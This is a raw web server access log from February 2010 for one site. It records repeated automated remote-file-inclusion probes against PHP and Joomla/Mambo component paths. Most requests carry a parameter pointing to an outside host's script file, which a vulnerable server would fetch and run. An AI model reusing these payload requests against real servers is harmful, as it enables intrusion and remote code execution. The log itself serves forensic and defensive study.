110.45.144.48 - - [18/Feb/2010:08:17:38 -0800] "GET /errors.php?error=http://serve.welovejesus.co.kr/data/log/.xB????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.144.48 - - [18/Feb/2010:08:17:39 -0800] "GET /errors.php?error=http://serve.welovejesus.co.kr/data/log/a.printer.xpp??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.144.48 - - [18/Feb/2010:08:17:39 -0800] "GET /logs/access_100211.log//errors.php?error=http://serve.welovejesus.co.kr/data/log/a.printer.xpp??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.144.48 - - [18/Feb/2010:08:17:39 -0800] "GET /logs//errors.php?error=http://serve.welovejesus.co.kr/data/log/.xB????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.144.48 - - [18/Feb/2010:08:17:40 -0800] "GET /logs//errors.php?error=http://serve.welovejesus.co.kr/data/log/a.printer.xpp??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.144.48 - - [18/Feb/2010:08:17:40 -0800] "GET /errors.php?error=http://serve.welovejesus.co.kr/data/log/a.printer.xpp??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.144.48 - - [18/Feb/2010:08:17:41 -0800] "GET /logs//errors.php?error=http://serve.welovejesus.co.kr/data/log/a.printer.xpp??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.144.48 - - [18/Feb/2010:08:17:51 -0800] "GET /logs/access_100211.log//errors.php?error=http://serve.welovejesus.co.kr/data/log/.xB????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.144.48 - - [18/Feb/2010:08:17:52 -0800] "GET /errors.php?error=http://serve.welovejesus.co.kr/data/log/.xB????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.144.48 - - [18/Feb/2010:08:17:53 -0800] "GET /logs//errors.php?error=http://serve.welovejesus.co.kr/data/log/.xB????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.193.216.73 - - [18/Feb/2010:08:18:39 -0800] "GET /logs/access_100107.log//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://serve.welovejesus.co.kr/data/log/.xB????? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.193.216.73 - - [18/Feb/2010:08:18:41 -0800] "GET /index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://serve.welovejesus.co.kr/data/log/.xB????? HTTP/1.0" 200 3626 "-" "Mozilla/5.0" "www.puaga.com"
62.193.216.73 - - [18/Feb/2010:08:18:41 -0800] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://serve.welovejesus.co.kr/data/log/.xB????? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.249.15.117 - - [18/Feb/2010:08:18:49 -0800] "GET /logs/bad_link.php?theme_path=http://www.gzzsyy.com.cn/brd/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.249.15.117 - - [18/Feb/2010:08:18:49 -0800] "GET /logs/access_100116.log%20%20/bad_link.php?theme_path=http://www.gzzsyy.com.cn/brd/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.249.15.117 - - [18/Feb/2010:08:18:49 -0800] "GET /bad_link.php?theme_path=http://www.gzzsyy.com.cn/brd/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.144.48 - - [18/Feb/2010:08:19:00 -0800] "GET /logs/access_100207.log//modules/xfsection/modify.php?dir_module=http://serve.welovejesus.co.kr/data/log/a.printer.xpp??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.144.48 - - [18/Feb/2010:08:19:01 -0800] "GET /modules/xfsection/modify.php?dir_module=http://serve.welovejesus.co.kr/data/log/a.printer.xpp??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.144.48 - - [18/Feb/2010:08:19:02 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://serve.welovejesus.co.kr/data/log/a.printer.xpp??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.144.48 - - [18/Feb/2010:08:19:04 -0800] "GET /logs/access_100207.log//modules/xfsection/modify.php?dir_module=http://serve.welovejesus.co.kr/data/log/.xB????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.144.48 - - [18/Feb/2010:08:19:05 -0800] "GET /modules/xfsection/modify.php?dir_module=http://serve.welovejesus.co.kr/data/log/.xB????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.144.48 - - [18/Feb/2010:08:19:06 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://serve.welovejesus.co.kr/data/log/.xB????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.144.48 - - [18/Feb/2010:08:19:06 -0800] "GET /logs/access_100207.log//modules/xfsection/modify.php?dir_module=http://serve.welovejesus.co.kr/data/log/a.printer.xpp??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.144.48 - - [18/Feb/2010:08:19:07 -0800] "GET /modules/xfsection/modify.php?dir_module=http://serve.welovejesus.co.kr/data/log/a.printer.xpp??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.144.48 - - [18/Feb/2010:08:19:09 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://serve.welovejesus.co.kr/data/log/a.printer.xpp??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.193.216.73 - - [18/Feb/2010:08:19:14 -0800] "GET /logs/access_100119.log//components/com_flyspray/startdown.php?file=http://serve.welovejesus.co.kr/data/log/a.printer.xpp??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.193.216.73 - - [18/Feb/2010:08:19:14 -0800] "GET /logs/access_100119.log//components/com_flyspray/startdown.php?file=http://serve.welovejesus.co.kr/data/log/.xB????? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.144.48 - - [18/Feb/2010:08:19:20 -0800] "GET /logs/access_100207.log//modules/xfsection/modify.php?dir_module=http://serve.welovejesus.co.kr/data/log/.xB????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.144.48 - - [18/Feb/2010:08:19:22 -0800] "GET /modules/xfsection/modify.php?dir_module=http://serve.welovejesus.co.kr/data/log/.xB????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.144.48 - - [18/Feb/2010:08:19:23 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://serve.welovejesus.co.kr/data/log/.xB????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.193.216.73 - - [18/Feb/2010:08:19:26 -0800] "GET /logs/access_100123.log//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://serve.welovejesus.co.kr/data/log/.xB????? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [18/Feb/2010:08:19:34 -0800] "GET /logs/access_100112.log%20%20/?DOCUMENT_ROOT=http://www.cipam.com/templates/css/.psy/lang/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [18/Feb/2010:08:19:34 -0800] "GET /logs/?DOCUMENT_ROOT=http://www.cipam.com/templates/css/.psy/lang/1.txt? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [18/Feb/2010:08:19:35 -0800] "GET /?DOCUMENT_ROOT=http://www.cipam.com/templates/css/.psy/lang/1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [18/Feb/2010:08:20:10 -0800] "GET /logs/access_100115.log%20%20/?DOCUMENT_ROOT=http://www.cipam.com/templates/css/.psy/lang/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [18/Feb/2010:08:20:36 -0800] "GET /logs/solpot.html?body=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [18/Feb/2010:08:20:36 -0800] "GET /solpot.html?body=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [18/Feb/2010:08:20:36 -0800] "GET /logs/access_100130.log/solpot.html?body=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.144.48 - - [18/Feb/2010:08:20:54 -0800] "GET /logs/access_100208.log//modules/xfsection/modify.php?dir_module=http://serve.welovejesus.co.kr/data/log/a.printer.xpp??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [18/Feb/2010:08:20:56 -0800] "GET /logs/access_100209.log/solpot.html?body=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.144.48 - - [18/Feb/2010:08:20:57 -0800] "GET /logs/access_100208.log//modules/xfsection/modify.php?dir_module=http://serve.welovejesus.co.kr/data/log/.xB????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.144.48 - - [18/Feb/2010:08:20:59 -0800] "GET /logs/access_100208.log//modules/xfsection/modify.php?dir_module=http://serve.welovejesus.co.kr/data/log/a.printer.xpp??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.249.15.117 - - [18/Feb/2010:08:21:00 -0800] "GET /logs/access_100118.log%20%20/bad_link.php?theme_path=http://www.gzzsyy.com.cn/brd/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.144.48 - - [18/Feb/2010:08:21:03 -0800] "GET /logs/access_100210.log//components/com_flyspray/startdown.php?file=http://serve.welovejesus.co.kr/data/log/.xB????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.144.48 - - [18/Feb/2010:08:21:04 -0800] "GET /components/com_flyspray/startdown.php?file=http://serve.welovejesus.co.kr/data/log/.xB????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.144.48 - - [18/Feb/2010:08:21:07 -0800] "GET /logs/access_100210.log//components/com_flyspray/startdown.php?file=http://serve.welovejesus.co.kr/data/log/a.printer.xpp??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.249.15.117 - - [18/Feb/2010:08:21:07 -0800] "GET /logs/access_100127.log%20%20/bad_link.php?theme_path=http://www.gzzsyy.com.cn/brd/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.144.48 - - [18/Feb/2010:08:21:08 -0800] "GET /components/com_flyspray/startdown.php?file=http://serve.welovejesus.co.kr/data/log/a.printer.xpp??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.144.48 - - [18/Feb/2010:08:21:08 -0800] "GET /logs//components/com_flyspray/startdown.php?file=http://serve.welovejesus.co.kr/data/log/a.printer.xpp??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.249.15.117 - - [18/Feb/2010:08:21:14 -0800] "GET /logs/access_100124.log%20%20/bad_link.php?theme_path=http://www.gzzsyy.com.cn/brd/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.249.15.117 - - [18/Feb/2010:08:21:14 -0800] "GET /logs/access_100116.log/bad_link.php?theme_path=http://www.gzzsyy.com.cn/brd/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.144.48 - - [18/Feb/2010:08:21:15 -0800] "GET /logs/access_100210.log//components/com_flyspray/startdown.php?file=http://serve.welovejesus.co.kr/data/log/.xB????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.144.48 - - [18/Feb/2010:08:21:16 -0800] "GET /components/com_flyspray/startdown.php?file=http://serve.welovejesus.co.kr/data/log/.xB????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.144.48 - - [18/Feb/2010:08:21:17 -0800] "GET /logs//components/com_flyspray/startdown.php?file=http://serve.welovejesus.co.kr/data/log/.xB????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.144.48 - - [18/Feb/2010:08:21:18 -0800] "GET /logs/access_100208.log//modules/xfsection/modify.php?dir_module=http://serve.welovejesus.co.kr/data/log/.xB????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.249.15.117 - - [18/Feb/2010:08:21:28 -0800] "GET /logs/access_100111.log/bad_link.php?theme_path=http://www.gzzsyy.com.cn/brd/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.144.48 - - [18/Feb/2010:08:21:39 -0800] "GET /logs/access_100210.log//components/com_flyspray/startdown.php?file=http://serve.welovejesus.co.kr/data/log/a.printer.xpp??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.144.48 - - [18/Feb/2010:08:21:40 -0800] "GET /components/com_flyspray/startdown.php?file=http://serve.welovejesus.co.kr/data/log/a.printer.xpp??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.144.48 - - [18/Feb/2010:08:21:42 -0800] "GET /logs//components/com_flyspray/startdown.php?file=http://serve.welovejesus.co.kr/data/log/a.printer.xpp??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:08:22:06 -0800] "GET //////administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://study.de/editor/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:08:22:07 -0800] "GET /logs///////administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://study.de/editor/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:08:22:07 -0800] "GET /logs/access_100207.log%20%20///////administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://study.de/editor/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [18/Feb/2010:08:22:09 -0800] "GET /logs/solpot.html?body=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [18/Feb/2010:08:22:09 -0800] "GET /logs/access_100130.log%20%20/solpot.html?body=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:08:22:10 -0800] "GET //////administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://study.de/editor/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [18/Feb/2010:08:22:10 -0800] "GET /solpot.html?body=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:08:22:10 -0800] "GET /logs///////administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://study.de/editor/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:08:22:10 -0800] "GET /logs/access_100207.log%20%20///////administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://study.de/editor/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.193.216.73 - - [18/Feb/2010:08:22:23 -0800] "GET /logs/access_100204.log//modules/xfsection/modify.php?dir_module=http://serve.welovejesus.co.kr/data/log/.xB????? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.193.216.73 - - [18/Feb/2010:08:22:23 -0800] "GET /logs/access_100204.log//modules/xfsection/modify.php?dir_module=http://serve.welovejesus.co.kr/data/log/a.printer.xpp??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.193.216.73 - - [18/Feb/2010:08:22:23 -0800] "GET /modules/xfsection/modify.php?dir_module=http://serve.welovejesus.co.kr/data/log/.xB????? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.193.216.73 - - [18/Feb/2010:08:22:23 -0800] "GET /modules/xfsection/modify.php?dir_module=http://serve.welovejesus.co.kr/data/log/a.printer.xpp??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.193.216.73 - - [18/Feb/2010:08:22:23 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://serve.welovejesus.co.kr/data/log/.xB????? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.193.216.73 - - [18/Feb/2010:08:22:23 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://serve.welovejesus.co.kr/data/log/a.printer.xpp??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.193.216.73 - - [18/Feb/2010:08:22:35 -0800] "GET /logs/access_100208.log//modules/xfsection/modify.php?dir_module=http://serve.welovejesus.co.kr/data/log/a.printer.xpp??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.193.216.73 - - [18/Feb/2010:08:22:35 -0800] "GET /logs/access_100208.log//modules/xfsection/modify.php?dir_module=http://serve.welovejesus.co.kr/data/log/.xB????? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:08:23:00 -0800] "GET /logs/access_100129.log%20%20///////administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://study.de/editor/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:08:23:03 -0800] "GET /logs/access_100129.log%20%20///////administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://study.de/editor/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.144.48 - - [18/Feb/2010:08:23:25 -0800] "GET /logs/access_100119.log//components/com_flyspray/startdown.php?file=http://serve.welovejesus.co.kr/data/log/.xB????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.144.48 - - [18/Feb/2010:08:23:26 -0800] "GET /logs/access_100119.log//components/com_flyspray/startdown.php?file=http://serve.welovejesus.co.kr/data/log/a.printer.xpp??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.144.48 - - [18/Feb/2010:08:23:33 -0800] "GET /logs/access_100119.log//components/com_flyspray/startdown.php?file=http://serve.welovejesus.co.kr/data/log/.xB????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.144.48 - - [18/Feb/2010:08:23:52 -0800] "GET /logs/access_100119.log//components/com_flyspray/startdown.php?file=http://serve.welovejesus.co.kr/data/log/a.printer.xpp??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:08:24:13 -0800] "GET //////administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://study.de/editor/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:08:24:13 -0800] "GET /logs/access_100207.log///////administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://study.de/editor/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:08:24:13 -0800] "GET /logs///////administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://study.de/editor/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.114.222.95 - - [18/Feb/2010:08:24:43 -0800] "GET /logs/access_100107.log//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://serve.welovejesus.co.kr/data/log/.xB????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.114.222.95 - - [18/Feb/2010:08:24:44 -0800] "GET /index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://serve.welovejesus.co.kr/data/log/.xB????? HTTP/1.0" 200 3626 "-" "Mozilla/5.0" "www.puaga.com"
210.114.222.95 - - [18/Feb/2010:08:24:45 -0800] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://serve.welovejesus.co.kr/data/log/.xB????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.114.222.95 - - [18/Feb/2010:08:24:54 -0800] "GET /logs/access_100118.log//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://serve.welovejesus.co.kr/data/log/.xB????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.144.48 - - [18/Feb/2010:08:24:57 -0800] "GET /logs/access_100107.log//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://serve.welovejesus.co.kr/data/log/.xB????? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.144.48 - - [18/Feb/2010:08:24:59 -0800] "GET /index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://serve.welovejesus.co.kr/data/log/.xB????? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
110.45.144.48 - - [18/Feb/2010:08:24:59 -0800] "GET /logs/access_100107.log//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://serve.welovejesus.co.kr/data/log/.xB????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.144.48 - - [18/Feb/2010:08:24:59 -0800] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://serve.welovejesus.co.kr/data/log/.xB????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.144.48 - - [18/Feb/2010:08:25:00 -0800] "GET /index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://serve.welovejesus.co.kr/data/log/.xB????? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
110.45.144.48 - - [18/Feb/2010:08:25:01 -0800] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://serve.welovejesus.co.kr/data/log/.xB????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.114.222.95 - - [18/Feb/2010:08:25:01 -0800] "GET /logs/access_100201.log//components/com_flyspray/startdown.php?file=http://serve.welovejesus.co.kr/data/log/a.printer.xpp??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:08:25:02 -0800] "GET /logs///////administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://study.de/editor/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:08:25:02 -0800] "GET //////administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://study.de/editor/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:08:25:02 -0800] "GET /logs/access_100207.log///////administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://study.de/editor/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.114.222.95 - - [18/Feb/2010:08:25:02 -0800] "GET /components/com_flyspray/startdown.php?file=http://serve.welovejesus.co.kr/data/log/a.printer.xpp??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.114.222.95 - - [18/Feb/2010:08:25:03 -0800] "GET /logs//components/com_flyspray/startdown.php?file=http://serve.welovejesus.co.kr/data/log/a.printer.xpp??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.114.222.95 - - [18/Feb/2010:08:25:24 -0800] "GET /logs/access_100201.log//components/com_flyspray/startdown.php?file=http://serve.welovejesus.co.kr/data/log/.xB????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.114.222.95 - - [18/Feb/2010:08:25:25 -0800] "GET /components/com_flyspray/startdown.php?file=http://serve.welovejesus.co.kr/data/log/.xB????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.114.222.95 - - [18/Feb/2010:08:25:26 -0800] "GET /logs//components/com_flyspray/startdown.php?file=http://serve.welovejesus.co.kr/data/log/.xB????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [18/Feb/2010:08:25:31 -0800] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://youngdukob.com/bbs/id1.asp?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [18/Feb/2010:08:25:31 -0800] "GET /logs/access_100107.log%20%20//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://youngdukob.com/bbs/id1.asp?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [18/Feb/2010:08:25:31 -0800] "GET /logs//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://youngdukob.com/bbs/id1.asp?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.144.48 - - [18/Feb/2010:08:25:50 -0800] "GET /logs/access_100104.log//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://serve.welovejesus.co.kr/data/log/.xB????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.144.48 - - [18/Feb/2010:08:25:53 -0800] "GET /logs/access_100104.log//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://serve.welovejesus.co.kr/data/log/.xB????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [18/Feb/2010:08:26:45 -0800] "GET /logs//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://youngdukob.com/bbs/id1.asp?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [18/Feb/2010:08:26:45 -0800] "GET /logs/access_100121.log%20%20//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://youngdukob.com/bbs/id1.asp?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
